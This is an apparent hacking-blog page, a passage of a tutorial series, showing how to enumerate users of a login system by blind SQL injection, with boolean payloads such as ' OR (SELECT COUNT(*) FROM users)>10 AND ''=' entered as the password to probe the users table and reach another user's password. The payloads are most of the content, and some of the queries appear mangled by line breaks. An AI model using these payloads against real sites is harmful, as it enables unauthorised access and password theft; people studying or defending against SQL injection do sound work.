Work space !
You can find other users on the system. We choose
to get jake's password simply because he was the
first in the list but there may be others.
You can still only ask yes/no questions, but you can
find out just about anything you want to with a little
patience. Again you use xx for the user name and enter the following as password:
Are there more than 10 rows in the password table?
' OR (SELECT COUNT(*) FROM users)>10 AND ''='
Is there a user with an r in his name?
' OR EXISTS(SELECT * FROM users WHERE name
LIKE '% r%') AND ''='
Is there a user (other than jake) with an a in his name?
' OR EXISTS(SELECT * FROM users WHERE name!
='jake' AND name LIKE '% a%') AND ''='
next page Find name using sql injection
via oneofthebest All articles about hacking have only an educational goal and we are not responsible
0 commentaires:
Enregistrer un commentaire